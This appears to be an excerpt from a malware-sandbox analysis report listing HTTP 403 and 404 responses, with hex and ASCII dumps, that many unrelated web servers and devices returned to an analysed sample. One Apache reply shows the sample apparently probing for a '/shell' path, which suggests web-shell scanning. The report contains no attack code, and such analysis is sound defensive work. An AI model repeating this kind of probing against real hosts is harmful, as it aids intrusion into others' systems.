Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:11 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:13 GMTContent-Type: text/htmlContent-Length: 5891Connection: keep-aliveKeep-Alive: timeout=20Vary: Accept-EncodingETag: "5e3effd5-1703"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 43 6f 6e 66 69 67 75 72 65 64 20 7c 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 29 3b 0a 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 20 52 65 67 75 6c 61 72 27 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 32 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 30 70 78 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 30 70 78 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 42 43 43 38 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 72 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 46 44 46 44 46 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 20 33 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 34 42 43 43 38 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 0a 20 20 20 20 7d 0a 0a 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 20 7b 0a 09 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 61 64 6d 69 6e 20 7b 0a 09 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:16 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:16 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:03 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:21 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 19 Feb 2022 15:06:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:30 GMTServer: Apache/2.2.22 (Win32) PHP/5.2.9-2Content-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Sat, 19 Feb 2022 15:06:33 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 01 Jan 1970 16:37:20 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 19 Feb 2022 15:06:37 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 19 Feb 2022 15:06:40 GMTServer: ApacheContent-Length: 59Keep-Alive: timeout=3, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Forbidden</h1>You don't have permission on this server.
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 19 Feb 2022 15:06:44 GMTServer: ApacheLast-Modified: Tue, 26 Apr 2016 09:36:45 GMTETag: "1e5-5316008094540;5d4493fa5d580"Accept-Ranges: bytesContent-Length: 485Vary: Accept-EncodingKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 20 69 64 3d 22 61 22 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 20 69 64 3d 22 62 22 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 62 75 74 74 6f 6e 20 69 64 3d 22 63 22 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 73 74 6f 72 79 2e 67 6f 28 2d 31 29 22 3e 42 61 63 6b 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 6a 73 2f 6c 6f 63 61 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 77 65 62 64 65 66 61 75 6c 74 2f 6a 73 2f 65 72 72 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head> <meta charset="utf-8"> <title id="a">The page is not found</title> <style>body{display:none;}</style> <link rel="stylesheet" type="text/css" href="/webdefault/css/error.css"></head><body> <h1 id="b">Sorry, the page you are looking for is not found.</h1> <button id="c" onclick="history.go(-1)">Back</button> <script src="/webdefault/js/locale.js"></script> <script src="/webdefault/js/error.js"></script></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: WebServer/1.0 UPnP/1.0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:48 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 19 Feb 2022 15:06:51 GMTContent-Type: text/htmlContent-Length: 124Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Oops! 403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.6.2Date: Sat, 19 Feb 2022 15:39:34 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Sat, 19 Feb 2022 15:06:55 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.10.3</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 19 Feb 2022 15:06:56 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
